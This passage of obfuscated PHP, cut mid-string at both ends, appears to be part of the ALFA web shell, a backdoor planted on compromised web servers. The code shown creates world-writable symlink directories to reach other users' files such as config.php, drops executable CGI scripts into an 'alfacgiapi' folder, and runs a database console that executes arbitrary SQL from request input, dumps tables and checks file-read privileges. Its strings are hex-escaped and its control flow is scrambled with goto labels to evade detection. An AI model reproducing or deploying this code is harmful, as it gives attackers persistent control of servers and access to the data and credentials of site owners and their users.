63\157\x6e\x66\x69\x67\56\160\150\x70\x22\x20\x73\x69\x7a\x65\x3d\x22\66\x30\x22\x2f\x3e\74\x62\162\x20\x2f\x3e\xd\12\74\151\x6e\160\165\164\x20\164\171\160\145\x3d\42\x74\145\170\164\x22\40\x6e\x61\155\x65\x3d\x22\163\171\x6d\x66\151\154\x65\x22\x20\160\154\x61\x63\145\x68\157\x6c\x64\x65\162\75\42\105\x78\141\x6d\x70\154\x65\x20\x3a\x20\141\154\146\141\56\164\x78\x74\x22\x20\x73\x69\172\145\75\x22\66\60\x22\57\x3e\15\12\x3c\x70\x3e\x3c\x69\x6e\160\165\164\40\164\171\160\x65\x3d\42\x73\x75\x62\x6d\151\164\x22\x20\166\141\154\x75\145\75\42\40\42\x20\x6e\x61\155\x65\x3d\x22\x73\171\x6d\x6c\151\x6e\x6b\x22\x20\x2f\76\74\57\x70\x3e\74\x2f\x66\x6f\162\155\76\74\x2f\143\x65\156\164\145\162\x3e"; goto JtPlr; SjeaK: $symname = $_POST["\x61\x6c\146\141\x36"]; goto p2GRq; p2GRq: $solevisible58 = $_POST["\x61\x6c\146\141\x37"]; goto rTkTk; rTkTk: if ($solevisible58) { goto v1Rkn; lBDRm: alfacgihtaccess("\163\171\x6d", $sym_dir, $symname); goto VpdQf; EwuFM: @mkdir($sym_dir, 0777, true); goto lBDRm; VpdQf: _alfa_symlink("{$path}", "{$sym_dir}\57{$symname}"); goto fZ60I; OK5Wj: echo "\x3c\x63\x65\156\164\x65\162\x3e\74\x62\x3e\74\x66\x6f\156\164\x20\143\x6f\x6c\x6f\162\x3d\x22\167\150\x69\x74\x65\x22\76\x43\154\x69\143\153\x20\76\x3e\x20\74\x2f\x66\157\156\x74\x3e\74\x61\40\x74\x61\162\147\145\x74\75\42\x5f\142\x6c\x61\156\x6b\x22\40\150\162\145\x66\x3d\x22" . $sym_dir . "\42\40\76\74\x62\x3e\74\146\x6f\156\164\x20\x73\151\172\x65\x3d\42\64\x22\x3e" . $symname . "\x3c\57\146\157\x6e\164\76\x3c\57\x62\76\74\x2f\141\x3e\x3c\57\142\x3e\74\x2f\x63\x65\x6e\x74\x65\162\x3e"; goto xpa4g; fZ60I: echo __pre(); goto OK5Wj; tYe6h: $rand_dir = $new_name . rand(111, 9999); goto H75qe; H75qe: $sym_dir = "\x61\154\x66\x61\x73\x79\x6d\154\151\156\x6b\x70\x68\160\57" . $rand_dir . "\x2f"; goto EwuFM; v1Rkn: $new_name = str_replace("\56", "\x5f", basename($symname)); goto tYe6h; xpa4g: } goto v6lxQ; v6lxQ: } else { echo "\x3c\x63\145\156\x74\x65\x72\76\74\160\162\x65\40\x63\154\x61\163\163\75\155\154\61\40\x73\164\x79\154\x65\x3d\x27\155\x61\162\x67\x69\x6e\x2d\164\x6f\160\x3a\65\x70\x78\x27\76\x3c\142\x3e\x3c\146\157\x6e\164\x20\143\157\154\x6f\162\75\42\x23\x46\106\106\106\x46\x46\42\76\x5b\x2b\135\40\123\171\155\154\151\x6e\153\40\x46\x75\x6e\143\164\151\157\156\40\104\151\163\141\142\x6c\x65\144\x20\x21\74\x2f\142\x3e\x3c\57\x66\157\156\x74\76\x3c\x2f\160\x72\145\x3e\74\x2f\x63\x65\156\164\x65\x72\x3e"; } } goto S3_Qf; p8BGD: alfafooter(); goto bSj7Y; bSj7Y: } goto Ixta2; zLeDO: function alfaWriteTocgiapi($name, $source) { goto iBmDm; QTrV9: @mkdir("\141\154\x66\x61\x63\x67\151\141\160\x69", 0755); goto Mp9y0; Mp9y0: __write_file("\x61\x6c\x66\141\x63\x67\x69\141\160\x69\x2f" . $name, __get_resource($source)); goto yoj9D; yoj9D: @chmod("\x61\x6c\x66\141\x63\x67\151\141\x70\151\57" . $name, 0755); goto IxFM9; iBmDm: @chdir(dirname($_SERVER["\123\103\x52\x49\120\124\137\x46\x49\x4c\x45\x4e\101\115\x45"])); goto QTrV9; IxFM9: } goto QhCss; JWRSz: function alfalogout() { unset($_SESSION["\101\x6c\146\x61\x55\163\145\162"], $_SESSION["\x41\154\146\x61\x50\x61\163\163"]); echo "\x3c\x63\x65\x6e\164\x65\x72\76\x3c\146\157\156\164\40\143\x6f\154\x6f\x72\75\x27\162\x65\144\47\76\x4c\x6f\x67\157\165\x74\x2e\x2e\56\x3c\57\146\157\x6e\164\76\74\x2f\x63\145\x6e\x74\145\x72\x3e"; } goto d6RZM; pMl2A: function alfaupdatepath() { if ($_POST["\160\x61\x74\150"] != '') { $_SESSION[__LAST_CWD__] = $_POST["\x70\141\164\150"]; } echo $_SESSION[__LAST_CWD__]; } goto DQTnU; Ixta2: function alfasql() { goto kVCQ2; cj9Iu: if (isset($db) && $db->link) { goto aRqU4; iA0Xh: echo "\74\x2f\164\141\x62\x6c\145\76\74\x2f\146\x6f\x72\x6d\x3e\74\142\162\57\76"; goto rVeOp; rVeOp: if ($_POST["\164\171\x70\145"] == "\155\x79\x73\161\154") { $db->query("\x53\x45\114\x45\x43\124\x20\61\x20\x46\122\x4f\x4d\x20\155\x79\x73\161\154\x2e\165\163\x65\x72\40\127\110\105\x52\105\x20\x63\157\156\143\141\x74\x28\x60\165\163\145\x72\140\54\40\x27\x40\47\54\40\140\150\x6f\x73\x74\x60\51\x20\x3d\40\125\123\x45\122\50\51\x20\x41\116\104\x20\x60\106\151\154\145\x5f\160\162\x69\x76\x60\40\x3d\40\x27\171\x27"); if ($db->fetch()) { echo "\74\146\157\x72\155\40\157\x6e\163\165\x62\x6d\151\x74\x3d\x22\x66\x73\50\47\63\x27\x2c\x74\x68\151\x73\x2e\x66\x2e\166\x61\154\x75\145\x29\73\x72\x65\x74\165\x72\x6e\x20\x66\x61\x6c\x73\145\73\42\76\x3c\144\x69\x76\40\143\x6c\x61\163\x73\75\x27\x74\170\164\x66\157\156\x74\47\76\114\x6f\141\144\x20\x66\151\x6c\145\72\x3c\x2f\x64\151\x76\76\x20\x3c\x69\x6e\x70\165\x74\40\x63\154\141\x73\163\x3d\47\164\157\x6f\x6c\x73\x49\x6e\x70\47\40\164\x79\160\x65\x3d\47\x74\x65\x78\164\x27\40\156\x61\x6d\145\x3d\47\146\47\76\40\74\x69\156\160\165\x74\x20\164\x79\160\145\75\x27\x73\165\142\155\151\x74\47\40\166\x61\154\165\x65\x3d\47\x20\x27\76\x3c\x2f\x66\x6f\162\155\x3e"; } } goto CxNJX; aRqU4: echo "\74\142\162\57\x3e\74\164\x61\142\x6c\x65\x20\x77\x69\144\x74\150\75\61\60\60\x25\40\x63\145\154\154\160\x61\x64\144\151\x6e\147\x3d\62\40\143\x65\154\154\163\x70\141\143\x69\156\x67\x3d\60\76"; goto rZY4n; rZY4n: if (!empty($_POST["\x73\x71\154\137\142\141\163\145"])) { goto kw0QS; lS3Qb: echo "\x3c\x70\76\74\151\156\x70\x75\164\x20\x74\x79\160\145\75\x27\143\x68\145\x63\x6b\142\157\170\47\x20\157\156\x63\x6c\x69\x63\x6b\75\47\151\x73\50\x29\x3b\47\76\40\74\151\x6e\160\165\x74\x20\164\x79\160\145\75\47\142\x75\x74\164\x6f\156\47\x20\166\141\x6c\165\x65\75\47\40\x44\165\x6d\x70\x20\47\x20\157\156\143\x6c\151\143\153\75\42\x66\163\x28\x27\64\x27\51\73\42\40\x63\154\141\163\163\75\47\x62\165\164\x74\157\x6e\x27\x3e\40\x3c\151\156\x70\x75\x74\40\164\171\160\x65\75\47\x62\165\x74\164\x6f\x6e\47\x20\166\141\x6c\x75\145\x3d\x27\40\104\162\157\160\x20\41\40\x27\40\x6f\156\143\x6c\151\x63\x6b\x3d\x22\146\x73\x28\47\x35\x27\x29\x3b\42\x20\143\154\x61\163\x73\75\x27\142\165\164\x74\157\x6e\47\x3e\74\57\160\x3e\x3c\144\151\x76\40\143\154\141\163\163\x3d\47\164\x78\x74\x66\x6f\x6e\x74\x27\76\x46\151\x6c\145\40\x70\x61\164\x68\72\x3c\57\144\151\166\x3e\74\151\x6e\x70\165\164\x20\x74\x79\x70\x65\75\47\164\x65\x78\x74\47\x20\x69\x64\x3d\x27\x64\x75\x6d\160\x66\151\154\x65\x27\x20\156\x61\155\x65\x3d\x27\x66\x69\x6c\145\47\x20\166\x61\154\165\x65\75\47\x64\x75\x6d\160\x2e\x73\x71\154\47\x3e" . ($dumpStatus ? "\x3c\160\x3e\x3c\141\40\143\x6c\x61\x73\x73\x3d\42\141\x63\x74\x69\x6f\x6e\x73\x22\40\150\162\145\146\75\x22\152\141\166\141\163\143\162\151\x70\x74\x3a\x76\x6f\x69\x64\x28\x30\51\73\x22\40\157\x6e\143\154\x69\x63\x6b\75\x22\x67\x28\47\x46\x69\154\x65\x73\124\x6f\x6f\x6c\163\47\54\x6e\165\154\x6c\54\x27\144\165\155\x70\x2e\x73\161\154\x27\54\40\x27\x64\157\167\x6e\x6c\157\x61\x64\47\51\42\76\74\146\x6f\x6e\x74\x20\143\x6f\x6c\157\162\75\x22\x23\x30\106\x30\42\x3e\176\40\104\x6f\167\x6e\x6c\157\x61\x64\x20\106\151\x6c\145\40\176\74\57\x66\157\156\164\76\74\57\x61\x3e\x3c\57\x70\x3e" : '') . "\x3c\x2f\164\144\76\74\164\144\40\x73\x74\171\x6c\x65\x3d\x27\142\x6f\x72\144\145\162\55\x74\157\x70\x3a\x32\x70\x78\x20\163\157\x6c\151\144\x20\43\x36\x36\x36\73\47\x3e"; goto lZbAd; R_YII: echo "\74\57\146\x6f\162\x6d\x3e"; goto aFQDN; F9X3D: $tbls_res = $db->listTables(); goto a9O8W; XQSqb: echo "\x3c\164\162\x3e\74\164\144\x20\x77\151\x64\164\150\75\x31\x20\x73\x74\171\154\x65\x3d\x27\142\157\x72\144\145\162\55\164\x6f\160\x3a\x32\x70\170\x20\163\x6f\154\x69\x64\x20\x23\66\66\66\73\47\76\74\x64\151\x76\40\143\x6c\141\x73\163\x3d\x27\164\170\164\x66\x6f\x6e\164\x27\x3e\x54\141\x62\x6c\x65\x73\72\x3c\x2f\x64\151\166\x3e\x3c\142\x72\76\74\x62\x72\x3e"; goto F9X3D; lZbAd: if (@$_POST["\x61\154\x66\141\x31"] == "\163\145\x6c\x65\x63\164") { goto FEi2h; jhkiC: echo "\x20\157\146\40{$pages}"; goto rZyiz; CNkuc: echo "\x3c\142\162\76\74\x62\x72\76"; goto v6y9z; rZyiz: if ($_POST["\x61\x6c\x66\x61\x33"] > 1) { echo "\x20\74\x61\40\x68\x72\145\x66\75\47\x6a\x61\x76\141\x73\143\162\151\160\x74\x3a\x76\157\151\x64\x28\60\51\x3b\47\x20\x6f\x6e\143\x6c\151\x63\x6b\x3d\146\163\50\x27\x31\x27\54\x27\133\x22" . $_POST["\141\x6c\146\x61\62"] . "\x22\x2c\42" . ($_POST["\x61\154\x66\141\x33"] - 1) . "\x22\135\x27\x29\x3e\46\154\x74\73\x20\x50\162\145\x76\x3c\57\141\x3e"; } goto uL1Xx; BEqwf: $_POST["\x61\154\x66\141\x33"]--; goto h1Y9S; HKm4R: $db->query("\x53\105\x4c\105\x43\x54\40\103\117\125\116\x54\x28\52\x29\40\x61\x73\40\x6e\x20\106\x52\117\115\40\x60" . $_POST["\x61\154\146\x61\x32"] . "\140"); goto mYtHs; TRf4U: $pages = ceil($num["\x6e"] / 30); goto j57rC; AJKn9: if ($_POST["\164\171\160\x65"] == "\160\x67\x73\161\x6c") { $_POST["\x61\x6c\x66\141\x32"] = "\x53\105\114\105\x43\124\x20\x2a\x20\106\x52\117\115\40\x60" . $_POST["\x61\x6c\x66\141\x32"] . "\140\40\114\111\115\111\124\40\x33\60\40\x4f\106\106\123\105\124\40" . $_POST["\x61\x6c\x66\x61\63"] * 30; } else { $_POST["\141\154\146\x61\x32"] = "\123\x45\114\x45\x43\x54\x20\x2a\x20\x46\x52\x4f\x4d\40\140" . $_POST["\141\x6c\x66\x61\62"] . "\x60\40\114\111\x4d\111\x54\x20" . $_POST["\141\154\146\x61\x33"] * 30 . "\54\x33\60"; } goto CNkuc; uL1Xx: if ($_POST["\x61\x6c\146\141\x33"] < $pages) { echo "\40\74\141\x20\x68\162\145\x66\75\47\x6a\141\x76\x61\x73\x63\162\x69\x70\164\x3a\166\x6f\x69\x64\x28\60\x29\73\47\x20\x6f\156\x63\x6c\x69\x63\153\x3d\x66\x73\x28\x27\x31\47\x2c\47\x5b\x22" . $_POST["\x61\x6c\x66\x61\x32"] . "\42\x2c\42" . ($_POST["\141\154\x66\x61\x33"] + 1) . "\x22\x5d\47\51\x3e\116\x65\x78\x74\x20\x26\147\x74\x3b\x3c\x2f\x61\76"; } goto BEqwf; FEi2h: $_POST["\141\x6c\146\x61\x31"] = "\x71\165\x65\x72\x79"; goto jAeEr; h1Y9S: $cache_table = $_POST["\141\154\146\x61\x32"]; goto AJKn9; jAeEr: $_POST["\x61\x6c\x66\x61\63"] = $_POST["\x61\x6c\146\141\63"] ? $_POST["\x61\154\x66\x61\x33"] : 1; goto HKm4R; mYtHs: $num = $db->fetch(); goto TRf4U; j57rC: echo "\x3c\x73\160\x61\156\76" . $_POST["\x61\x6c\x66\141\x32"] . "\74\x2f\163\160\141\156\x3e\40\50{$num["\x6e"]}\x20\162\145\x63\157\x72\144\x73\x29\x20\120\141\147\x65\x20\43\40\74\x69\156\x70\x75\x74\x20\x74\x79\x70\x65\x3d\164\x65\x78\164\40\x6e\141\x6d\145\x3d\47\x61\x6c\x66\x61\x33\x27\x20\166\141\x6c\165\x65\x3d" . (int) $_POST["\141\x6c\x66\x61\63"] . "\x3e"; goto jhkiC; v6y9z: } goto Pgm2G; aFQDN: if (@$_POST["\x61\154\146\x61\x31"] == "\x65\x64\x69\x74" && !empty($_POST["\141\154\146\141\x32"])) { goto xixnl; pN0bk: echo "\x3c\57\164\x61\x62\154\145\76\x3c\x69\x6e\x70\165\164\40\164\x79\160\x65\x3d\x27\x68\x69\144\144\x65\x6e\x27\40\x6e\x61\x6d\x65\75\47\137\x5f\101\x4c\x46\101\x44\x41\124\101\x27\x20\x76\141\x6c\165\145\75\x27" . __ZW5jb2Rlcg(json_encode($data[1] != "\x30" ? array("\137\137\x41\x4c\x46\101\113\x45\x59" => $data[1], "\137\137\x41\x4c\106\x41\113\x45\x59\126\101\x4c" => $data[2]) : $fetch)) . "\47\76\74\x69\156\160\165\164\x20\164\171\160\145\75\x27\150\x69\144\x64\145\156\x27\40\x6e\141\x6d\x65\75\47\x5f\x5f\x41\114\x46\x41\x54\102\114\47\x20\x76\141\x6c\x75\x65\75\47{$data[0]}\x27\x3e\x3c\151\x6e\x70\165\x74\x20\164\x79\x70\145\x3d\x27\163\165\142\x6d\x69\x74\47\40\166\141\x6c\165\x65\x3d\47\40\x27\76\x3c\x2f\146\x6f\x72\x6d\76"; goto a4RX5; wlEZw: echo "\74\160\x3e\x3c\x64\151\x76\x20\143\x6c\141\x73\163\x3d\x22\x74\x78\164\x66\x6f\156\164\x22\x3e\x54\141\142\154\145\72\x3c\x2f\x64\x69\166\76\x20\74\x66\157\x6e\164\x20\143\x6f\154\x6f\162\x3d\42\x23\60\106\60\x22\76" . $data[0] . "\74\x2f\146\x6f\156\164\x3e\x3c\57\x70\76"; goto qgs1r; jpcaL: if ($data[1] != "\60") { goto Kc43t; Kc43t: $data[2] = __ZGVjb2Rlcg($data[2]); goto igzX7; igzX7: $data[2] = str_replace("\x22", '', $data[2]); goto V4fPB; V4fPB: $fetch = $db->fetch($db->query("\123\x45\x4c\105\x43\124\40\x2a\x20\x46\122\x4f\x4d\40\140" . $data[0] . "\140\40\x57\110\105\x52\x45\40\x60" . $data[1] . "\x60\x20\x3d\40\x27" . $data[2] . "\x27")); goto frYNC; frYNC: $fetch["\x5f\x5f\101\x4c\106\101\113\105\x59"] = $data[1]; goto mZIQB; mZIQB: $fetch["\137\x5f\101\114\106\101\113\105\131\x56\x41\114"] = $data[2]; goto bR8uY; bR8uY: } else { $d = __ZGVjb2Rlcg($data[2]); $fetch = json_decode($d, true); } goto r38gd; qgs1r: echo "\74\146\x6f\162\155\x20\157\156\163\x75\x62\x6d\x69\164\x3d\47\x66\x73\165\x28\164\150\151\163\51\73\x72\x65\x74\x75\162\156\x20\146\141\x6c\x73\x65\73\x27\x3e\74\164\141\x62\154\145\x20\x62\x6f\x72\144\x65\x72\x3d\47\x31\47\76"; goto jpcaL; r38gd: foreach ($fetch as $key => $value) { goto sX3rX; G6EHJ: $value = htmlspecialchars($value); goto yZFhd; sX3rX: if ($key == "\137\x5f\101\x4c\106\x41\x4b\x45\x59" || $key == "\x5f\x5f\101\x4c\106\101\113\x45\x59\126\101\114") { continue; } goto G6EHJ; yZFhd: echo "\74\164\162\76\x3c\x74\x64\x3e{$key}\x3c\x2f\164\144\x3e\x3c\164\144\76\x3c\x69\x6e\160\x75\164\40\156\141\155\x65\x3d\x27{$key}\47\x20\166\x61\154\165\x65\x3d\47{$value}\47\40\x2f\76\74\57\x74\144\76\74\57\164\x72\76"; goto fEzBL; fEzBL: } goto pN0bk; xixnl: $data = explode("\72", $_POST["\141\x6c\146\x61\x33"]); goto wlEZw; a4RX5: } goto ToRyr; T_MsO: echo "\x3c\57\x74\x64\x3e\x3c\x2f\164\162\76"; goto Mbvju; Pgm2G: if (@$_POST["\141\x6c\x66\x61\61"] == "\x71\x75\x65\x72\171" && !empty($_POST["\141\154\x66\x61\x32"])) { goto b6Wfx; ijhjQ: $db->query(@$_POST["\x61\154\146\141\x32"]); goto xp0pC; b6Wfx: $prikey = $db->fetch($db->query("\123\105\x4c\x45\x43\124\x20\103\x4f\x4c\125\x4d\116\137\116\101\115\x45\x20\106\122\117\x4d\x20\x49\116\x46\117\122\115\x41\x54\111\117\116\137\123\x43\x48\105\x4d\101\56\103\x4f\114\125\x4d\x4e\x53\40\x57\x48\x45\122\105\40\x54\x41\x42\114\x45\x5f\123\103\x48\x45\x4d\101\x20\75\x20\x27" . @addslashes($_POST["\163\x71\154\137\142\x61\x73\145"]) . "\x27\x20\x41\x4e\x44\40\x54\101\102\114\x45\137\116\101\x4d\x45\40\x3d\x20\x27" . @addslashes($cache_table) . "\47\x20\x41\116\x44\40\103\117\114\125\115\116\137\113\x45\x59\40\x3d\x20\47\x50\x52\x49\x27")); goto ijhjQ; xp0pC: if ($db->res !== false) { goto wswxO; gbLec: while ($item = $db->fetch()) { if (!$title) { goto tW6Rd; jt93s: echo "\74\57\164\x72\x3e\74\164\x72\76"; goto qoTiI; qoTiI: $line = 2; goto X3QkD; tW6Rd: echo "\74\164\x72\x3e\x3c\164\150\76\43\x3c\57\x74\150\x3e"; goto DD10u; MRP_i: reset($item); goto g8R7O; DD10u: foreach ($item as $key => $value) { echo "\74\164\150\x3e" . $key . "\74\57\x74\x68\x3e"; } goto MRP_i; g8R7O: $title = true; goto jt93s; X3QkD: } if ($cache_table != '') { $cacheMsg = "\74\x61\40\150\162\x65\146\x3d\x22\x6a\141\166\x61\163\143\x72\x69\160\x74\x3a\166\x6f\151\x64\x28\60\x29\73\x22\40\157\156\143\154\x69\143\153\x3d\146\x73\50\x27\62\x27\54\47\x5b\42" . $cache_table . "\x22\x2c\x22" . (!$prikey["\x43\x4f\114\125\115\116\x5f\116\101\x4d\105"] ? 0 : $prikey["\103\x4f\x4c\x55\x4d\x4e\137\116\x41\115\105"]) . "\x22\x2c\42" . __ZW5jb2Rlcg(json_encode(!$prikey["\103\x4f\114\125\115\116\x5f\116\x41\115\105"] ? $item : $item[$prikey["\103\x4f\114\x55\x4d\116\137\x4e\x41\x4d\x45"]])) . "\42\135\47\x29\x3e\x45\144\151\164\x3c\x2f\141\x3e"; } else { $cacheMsg = "\x2d"; } echo "\x3c\x74\x72\x20\143\154\141\x73\163\75\x22\154" . $line . "\42\76\x3c\x74\144\76" . $cacheMsg . "\74\x2f\x74\144\x3e"; $line = $line == 1 ? 2 : 1; foreach ($item as $key => $value) { if ($value == null) { echo "\74\x74\x64\x3e\74\151\76\x6e\x75\154\154\74\x2f\151\x3e\x3c\x2f\164\144\76"; } else { echo "\x3c\x74\x64\76" . nl2br(htmlspecialchars($value)) . "\x3c\57\164\x64\76"; } } echo "\74\x2f\x74\x72\x3e"; } goto e36XH; YHBP0: $line = 1; goto gbLec; e36XH: echo "\74\57\x74\x61\142\154\x65\x3e"; goto eyYlu; jqa50: echo "\x3c\164\x61\142\154\x65\40\167\151\x64\x74\x68\75\42\61\x30\x30\45\42\x20\143\145\x6c\154\x73\x70\141\x63\x69\x6e\147\75\42\x31\42\x20\x63\x65\154\154\160\x61\144\x64\151\156\147\75\42\62\x22\40\143\x6c\141\163\163\75\42\x6d\x61\151\156\x22\x20\x73\x74\x79\154\x65\75\x22\x62\141\143\x6b\x67\x72\157\x75\x6e\144\55\143\157\x6c\157\162\72\x23\62\71\x32\x39\62\x39\42\40\142\x6f\x72\x64\145\x72\75\42\x31\x22\x3e"; goto YHBP0; wswxO: $title = false; goto jqa50; eyYlu: } else { echo "\x3c\144\x69\x76\x3e\74\142\76\x45\162\162\157\x72\72\74\57\142\x3e\x20" . htmlspecialchars($db->error()) . "\x3c\x2f\x64\x69\166\x3e"; } goto CYPmI; CYPmI: } goto R_YII; ToRyr: if (@$_POST["\141\154\146\x61\61"] == "\x75\x70\144\141\164\x65" && !empty($_POST["\141\x6c\146\x61\x32"])) { goto cgJv2; cU92l: echo "\74\57\x74\x61\142\x6c\145\x3e\74\151\x6e\x70\x75\164\x20\164\x79\160\x65\75\x27\150\151\144\x64\x65\156\x27\x20\x6e\x61\x6d\145\75\47\137\137\101\114\106\101\104\101\x54\x41\47\40\x76\x61\x6c\x75\x65\x3d\x27" . __ZW5jb2Rlcg(json_encode(isset($data2["\x5f\137\x41\114\x46\x41\113\x45\131"]) ? array("\x5f\137\101\114\106\x41\x4b\x45\131" => $keyval["\x5f\x5f\101\x4c\x46\x41\113\x45\131"], "\x5f\x5f\101\114\x46\x41\113\x45\x59\126\101\x4c" => $keyval["\x5f\x5f\x41\114\x46\101\113\105\131\126\x41\x4c"]) : $data)) . "\x27\x3e\74\151\x6e\160\x75\x74\40\x74\x79\x70\145\75\x27\150\x69\144\144\x65\156\x27\40\156\141\155\x65\x3d\47\x5f\137\x41\114\106\x41\x54\102\114\x27\x20\166\141\154\x75\x65\75\47{$data["\137\137\x41\114\x46\x41\x54\x42\x4c"]}\47\76\x3c\x69\156\x70\x75\x74\x20\164\x79\x70\145\75\x27\163\x75\x62\x6d\x69\164\47\40\x76\141\154\x75\x65\x3d\47\40\x27\76\74\57\146\157\x72\x6d\x3e"; goto WwvyR; WwvyR: if (!isset($data2["\x5f\x5f\101\114\x46\x41\113\105\131"])) { goto ZWXyV; Nhej1: foreach ($data2 as $key => $value) { goto hghXr; MfUqR: $value = addslashes($value); goto chlLV; hghXr: if ($key == "\137\x5f\101\114\x46\x41\124\102\114" || $key == "\x5f\x5f\x41\114\x46\x41\x44\101\124\x41") { continue; } goto MfUqR; chlLV: $where .= "\x60{$key}\140\x20\75\x20\47{$value}\47\x20\101\x4e\104\x20"; goto yfP2U; yfP2U: } goto C7k9W; C7k9W: $where = substr($where, 0, -4); goto SiaxC; ZWXyV: $where = ''; goto Nhej1; SiaxC: } else { $where = "\x60{$data2["\x5f\137\101\x4c\106\x41\113\105\x59"]}\140\x20\x3d\x20\47" . addslashes($data2["\137\137\x41\x4c\x46\x41\113\105\131\x56\x41\x4c"]) . "\47"; } goto PE5Hx; Loruf: echo "\74\146\x6f\x72\x6d\x20\x6f\x6e\163\165\142\x6d\151\x74\75\x27\146\x73\165\50\x74\150\151\163\x29\x3b\x72\145\164\x75\162\156\40\146\141\154\163\145\73\47\76\x3c\164\141\142\x6c\145\40\x62\157\162\x64\x65\162\75\x27\x31\x27\x3e"; goto qXRwq; lFsXy: if ($db->error()) { echo "\74\x64\151\x76\76\74\142\x3e\x45\x72\162\157\162\x3a\74\57\x62\x3e\x20" . htmlspecialchars($db->error()) . "\x3c\x2f\x64\x69\166\76"; } else { echo "\x53\165\x63\x63\x65\x73\x73\56\56\x2e\x21"; } goto IGGv9; egn7t: $db->fetch($db->query("\125\x50\x44\101\x54\x45\x20\x60{$data["\137\137\x41\114\x46\101\124\102\114"]}\140\x20\123\x45\x54\40{$set}\x20\x57\110\x45\x52\105\x20{$where}")); goto lFsXy; aZpli: $keyval = array(); goto w7B76; PE5Hx: $set = substr($set, 0, -1); goto egn7t; KmFRK: foreach ($data as $key => $value) { goto npfFq; cexCX: echo "\74\164\x72\x3e\x3c\164\x64\76{$key}\74\57\x74\144\x3e\74\164\x64\76\74\151\156\160\x75\x74\x20\156\x61\155\x65\x3d\x27{$key}\x27\40\166\141\154\x75\145\75\47{$value}\x27\x20\x2f\76\74\x2f\x74\x64\76\x3c\57\164\x72\x3e"; goto v0bz7; npfFq: if ($key == "\x5f\x5f\101\114\106\101\x54\102\x4c" || $key == "\137\x5f\101\x4c\x46\x41\x44\x41\x54\x41") { continue; } goto J7dRB; ctpSv: $value = htmlspecialchars($value); goto cexCX; eAkNH: $set .= "\x60{$key}\x60\x20\75\x20\47" . addslashes($value) . "\x27\x2c"; goto ctpSv; J7dRB: if ($data2["\x5f\137\x41\x4c\x46\x41\x4b\x45\x59"] == $key) { $keyval["\x5f\x5f\x41\114\x46\x41\x4b\105\131"] = $key; $keyval["\137\x5f\x41\114\106\101\113\x45\131\126\x41\x4c"] = $value; } goto eAkNH; v0bz7: } goto lyjs3; cgJv2: $data = json_decode($_POST["\141\154\x66\141\62"], true); goto AQldU; YXzQ2: $data2 = json_decode(__ZGVjb2Rlcg($alfadata), true); goto aZpli; lyjs3: unset($data["\137\x5f\x41\114\106\101\x44\101\x54\101"]); goto cU92l; w7B76: echo "\74\x70\76\74\x64\x69\x76\40\x63\x6c\x61\163\x73\x3d\x22\x74\170\164\146\x6f\156\x74\42\x3e\x54\141\x62\154\x65\72\x3c\x2f\x64\x69\166\76\x20\74\146\157\156\x74\x20\x63\x6f\x6c\157\x72\75\x22\x23\x30\x46\x30\42\76" . $data["\137\x5f\x41\114\x46\x41\124\102\114"] . "\74\x2f\x66\x6f\x6e\x74\x3e\x3c\57\x70\76"; goto Loruf; qXRwq: $set = ''; goto KmFRK; AQldU: $alfadata = $data["\x5f\137\x41\114\x46\x41\x44\x41\124\x41"]; goto YXzQ2; IGGv9: } goto g62Ry; a9O8W: while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST["\x73\x71\x6c\x5f\x63\157\x75\x6e\164"])) { $n = $db->fetch($db->query("\123\105\114\x45\x43\x54\40\x43\x4f\x55\116\124\50\x2a\x29\x20\x61\163\40\x6e\40\x46\x52\x4f\115\x20\140" . $value . "\x60")); } $value = htmlspecialchars($value); echo "\74\156\157\x62\162\76\74\151\156\x70\165\164\x20\x74\171\160\145\75\47\x63\x68\145\x63\153\x62\157\x78\x27\x20\x6e\x61\155\x65\75\47\x74\142\x6c\x5b\x5d\47\40\x76\141\x6c\165\x65\x3d\47" . $value . "\47\76\x26\x6e\142\x73\160\x3b\x3c\141\40\150\162\145\x66\x3d\x27\152\141\x76\141\163\143\x72\x69\160\x74\72\166\x6f\x69\144\x28\x30\51\x3b\47\x20\157\x6e\143\154\151\143\153\x3d\42\x66\x73\x28\x27\x30\x27\x2c\47" . $value . "\x27\51\x22\x3e\x3c\x73\x70\x61\156\x20\143\154\x61\x73\163\x3d\47\155\171\x73\x71\154\x5f\x74\141\142\154\145\163\x27\x20\x73\x74\x79\154\145\x3d\47\x66\x6f\x6e\164\x2d\x77\145\151\x67\x68\x74\x3a\x75\x6e\163\x65\x74\x3b\x27\76" . $value . "\x3c\57\163\x70\141\x6e\x3e\x3c\57\x61\76" . (empty($_POST["\x73\161\154\137\x63\157\165\x6e\164"]) ? "\x26\x6e\x62\163\160\x3b" : "\40\74\x73\x6d\141\x6c\154\x3e\74\163\x70\141\x6e\x20\163\164\x79\x6c\145\75\x27\146\x6f\156\x74\55\167\x65\x69\x67\x68\x74\x3a\x75\x6e\x73\145\x74\73\x27\40\143\x6c\x61\163\163\75\x27\155\x79\x73\161\154\x5f\164\x61\142\154\145\137\143\157\165\x6e\x74\x27\x3e\50{$n["\156"]}\x29\74\x2f\x73\160\x61\x6e\76\74\57\x73\x6d\141\x6c\x6c\x3e") . "\x3c\x2f\156\157\x62\x72\76\74\x62\x72\x3e"; } goto lS3Qb; kw0QS: $db->selectdb($_POST["\x73\161\154\137\142\x61\163\x65"]); goto XQSqb; g62Ry: if ($_POST["\x61\154\146\x61\x31"] != "\x65\144\151\x74" && $_POST["\141\x6c\x66\141\x31"] != "\x75\x70\x64\141\164\145") { goto sbaF3; NbNH5: echo $_POST["\x61\154\x66\141\61"] != "\x6c\157\x61\x64\x66\151\x6c\145" ? htmlspecialchars($_POST["\141\154\146\x61\x32"]) : ''; goto c09yV; sbaF3: echo "\x3c\160\76\x51\165\x65\162\171\x3a\74\x2f\x70\x3e\x3c\x66\x6f\x72\155\x20\157\x6e\163\165\x62\x6d\151\164\x3d\x27\146\x73\50\164\150\x69\163\x29\x3b\162\x65\164\165\162\156\x20\146\141\x6c\x73\145\x3b\47\x3e\xd\xa\74\x69\156\160\x75\164\40\164\171\x70\x65\75\47\x68\x69\144\x64\x65\156\x27\40\156\x61\x6d\145\x3d\47\141\154\x66\141\x31\x27\x20\166\x61\x6c\165\145\x3d\47\x71\165\145\162\171\x27\x2f\76\xd\xa\x3c\x74\x65\x78\164\141\162\145\141\40\x6e\x61\x6d\x65\x3d\x27\x71\165\145\162\x79\47\40\163\164\171\x6c\x65\x3d\47\167\x69\144\164\150\72\61\60\x30\45\73\x68\145\x69\x67\150\164\x3a\61\60\60\160\170\x27\76"; goto NbNH5; c09yV: echo 